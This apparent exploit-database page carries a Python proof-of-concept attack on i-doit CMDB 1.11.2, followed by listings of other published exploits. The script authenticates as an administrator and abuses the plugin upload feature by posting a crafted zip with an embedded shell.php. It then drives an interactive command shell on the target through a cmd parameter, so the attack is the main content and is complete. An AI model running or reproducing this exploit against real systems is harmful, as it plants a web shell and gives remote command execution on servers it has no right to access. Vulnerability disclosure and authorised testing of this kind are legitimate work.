Menu

"i-doit CMDB 1.11.2 - Remote Code Execution"

Author

AkkuS

Platform

php

Release date

2018-12-09

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
# Exploit Title: i-doit CMDB 1.11.2 - Remote Code Execution
# Date: 2018-12-05
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.i-doit.org/
# Software Link: https://www.i-doit.org/i-doit-open-1-11-2/
# Version: v1.11.2
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software Description : The IT-documentation solution i-doit is based on a
# complete open
# source configuration management and database. Using i-doit as a CMDB you
# can manage your IT according to ITIL best practices and configurate the significant
# components of your IT environment
# Description : This application has an upload feature that allows an
# authenticated user with administrator
# roles to upload arbitrary files to the main website directory.
# ==================================================================
# PoC: Exploit upload the ".php" file in the ".zip" file to Remote Code Execution.
# i-doit accepts zip files as a plugin and extract them to the main
# directory. In order for the ".zip" file to be accepted by the application, it must
# contain a file named "package.json

#!/usr/bin/python

import mechanize
import sys
import cookielib
import requests
import colorama
from colorama import Fore

print
"\n############################################################################"
print "# i-doit CMDB & ITSM 1.11.2 Remote Code Execution - Remote Code Execution  #"
print "#                   Vulnerability discovered byvAkkuS                      #"
print "#                  My Blog - https://www.pentest.com.tr					  #"
print
"############################################################################\n"
if (len(sys.argv) != 2):
    print "[*] Usage: poc.py <RHOST>"
    exit(0)

rhost = sys.argv[1]

# User Information Input
UserName = str(raw_input("User Name: "))
Password = str(raw_input("Password: "))

# Login into site
print(Fore.BLUE + "+ [*] Loging in...")
br = mechanize.Browser()
br.set_handle_robots(False)

# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

br.open("http://"+rhost+"/admin/")
assert br.viewing_html()
br.select_form(nr=0)
br.form['username'] = UserName
br.form['password'] = Password
br.submit()

title = br.title()
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")

# Arbitrary ".php" File Upload Records with multipart/form-data to RCE
rce_headers = {"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data;
boundary=---------------------------13859713751632544601258659337"}
rce_data="-----------------------------13859713751632544601258659337\r\nContent-Disposition:
form-data;
name=\"action\"\r\n\r\nadd\r\n-----------------------------13859713751632544601258659337\r\nContent-Disposition:
form-data;
name=\"mandator\"\r\n\r\n0\r\n-----------------------------13859713751632544601258659337\r\nContent-Disposition:
form-data; name=\"module_file\"; filename=\"test.zip\"\r\nContent-Type:
application/zip\r\n\r\nPK\x03\x04\x14\x00\x08\x00\x08\x00\x06\x89\x85M\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00
\x00package.jsonUT\r\x00\x07\xcc\xdb\x07\\\xcc\xdb\x07\\\xcc\xdb\x07\\ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00\x03\x00PK\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00PK\x03\x04\x14\x00\x08\x00\x08\x00G\x87{M\x00\x00\x00\x00\x00\x00\x00\x00\xdc\x01\x00\x00\t\x00
\x00shell.phpUT\r\x00\x07wM\xfd[7\x81\x07\\wM\xfd[ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00\x95\x91\xcbj\xc30\x10E\xf7\xfa\x8a\xc1\x18,\xd3\xe6\x0b\xd2G6I)d\x15\xb2+e\x10\xf2\xb8\x16\xd1#x\xe4<\x08\xf9\xf7:\x8d\xe3\xb8M\xbb\xe8JH\xf7\xce\xbdg\xd0\xc3\xf3\xbaZ\x8b4V\x86\xb14\x96\xe0\x11\x10g\xaf\xf3)\xe2XLx\xcf\x91\x9cLt\xe5B\x01\xcdG\x18m\xe1\xeaM\xf2o\x16\x15c\rw\xe6\x87!\xd5\xc19\xe5\x8b68\xc5\x97\xe9\xf2-\xd1\xaeH\xde\xc7B\x98\x12\xa4\xb6\x8a\x19ig8\xb2\xcc\x16TZ\xd2\xd1\x04?k\xfc\xd7\x99\xe59\x1c\x84\x00\x80\xb4\xec\x9e\xda
O[\xb8\xf5\xca\xec\xcc\x92\xb5\xad\xc3\x81\xd1\x93\xf1\x9b\xb0\"yAiuq\x04\xb2L'\x84\x8b\xad\xa7\xd0\xcaZl\x98j<I\xa8\xeaZ\xed\xaf\x1c\xbf\xa9}\xf3=\x9c\xef}\xd3\xbf\xaa\xfe*\x19\xc4\xdf\xae\xd0Mt\xdf0\xd0\x8f\xe2\x13PK\x07\x08\xc6=\x06k\xde\x00\x00\x00\xdc\x01\x00\x00PK\x01\x02\x14\x03\x14\x00\x08\x00\x08\x00\x06\x89\x85M\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0c\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\x00\x00\x00\x00package.jsonUT\r\x00\x07\xcc\xdb\x07\\\xcc\xdb\x07\\\xcc\xdb\x07\\ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00PK\x01\x02\x14\x03\x14\x00\x08\x00\x08\x00G\x87{M\xc6=\x06k\xde\x00\x00\x00\xdc\x01\x00\x00\t\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\\\x00\x00\x00shell.phpUT\r\x00\x07wM\xfd[7\x81\x07\\wM\xfd[ux\x0b\x00\x01\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xb1\x00\x00\x00\x91\x01\x00\x00\x00\x00\r\n-----------------------------13859713751632544601258659337--\r\n"

upload = requests.post("http://"+rhost+"/admin/?req=modules&action=add",
headers=rce_headers, cookies=cj, data=rce_data)
# Upload Control
if upload.status_code == 200:
   print (Fore.GREEN + "+ [*] Shell successfully uploaded!")

# Command Execute
while True:
      shellctrl = requests.get("http://"+rhost+"/shell.php")
      if shellctrl.status_code == 200:
         Command = str(raw_input(Fore.WHITE + "shell> "))
     URL = requests.get("http://"+rhost+"/shell.php?cmd="+Command+"")
            print URL.text
      else:
         print (Fore.RED + "+ [X] Unable to upload or access the shell")
         sys.exit()

# end
Release Date Title Type Platform Author
2019-08-16 "Integria IMS 5.0.86 - Arbitrary File Upload" webapps php Greg.Priest
2019-08-16 "Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2019-08-14 "WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-14 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection" webapps php qw3rTyTy
2019-08-14 "SugarCRM Enterprise 9.0.0 - Cross-Site Scripting" webapps php "Ilca Lucian Florin"
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell" webapps php xerubus
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download" webapps php xerubus
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-13 "AZORult Botnet - SQL Injection" remote php prsecurity
2019-08-13 "Agent Tesla Botnet - Arbitrary Code Execution" remote php prsecurity
2019-08-12 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Formula Injection" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting via File Upload" webapps php "Aishwarya Iyer"
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting" webapps php Greg.Priest
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection" webapps php qw3rTyTy
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download" webapps php qw3rTyTy
2019-08-08 "Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)" webapps php "Mr Winst0n"
2019-08-08 "Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting" webapps php Greg.Priest
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
2019-08-02 "1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting" webapps php "Kusol Watchara-Apanukorn"
2019-08-02 "Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection" webapps php n1x_
2019-08-02 "Sar2HTML 3.2.1 - Remote Command Execution" webapps php "Cemal Cihad ÇİFTÇİ"
2019-08-01 "WebIncorp ERP - SQL injection" webapps php n1x_
Release Date Title Type Platform Author
2019-08-12 "Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)" remote linux AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-07-12 "Sahi Pro 8.0.0 - Remote Command Execution" webapps java AkkuS
2019-06-17 "AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)" remote php AkkuS
2019-06-11 "Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)" remote linux AkkuS
2019-05-14 "PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)" remote php AkkuS
2019-04-30 "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)" remote php AkkuS
2019-04-25 "osTicket 1.11 - Cross-Site Scripting / Local File Inclusion" webapps php AkkuS
2019-04-22 "ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-04-18 "ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)" remote windows AkkuS
2019-04-15 "CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)" remote php AkkuS
2019-04-12 "ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)" webapps php AkkuS
2019-04-03 "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)" remote php AkkuS
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-03-11 "Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)" webapps multiple AkkuS
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Usermin 1.750 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-12 "Jenkins 2.150.2 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-01-24 "SirsiDynix e-Library 3.5.x - Cross-Site Scripting" webapps cgi AkkuS
2019-01-18 "Webmin 1.900 - Remote Command Execution (Metasploit)" remote cgi AkkuS
2019-01-10 "eBrigade ERP 4.5 - Arbitrary File Download" webapps php AkkuS
2019-01-02 "Vtiger CRM 7.1.0 - Remote Code Execution" webapps php AkkuS
2018-12-19 "Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)" webapps php AkkuS
2018-12-09 "i-doit CMDB 1.11.2 - Remote Code Execution" webapps php AkkuS
2018-12-04 "Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting" webapps php AkkuS
2018-12-03 "Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution" webapps php AkkuS
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45957/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/45957/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/45957/40457/i-doit-cmdb-1112-remote-code-execution/download/", "exploit_id": "45957", "exploit_description": "\"i-doit CMDB 1.11.2 - Remote Code Execution\"", "exploit_date": "2018-12-09", "exploit_author": "AkkuS", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse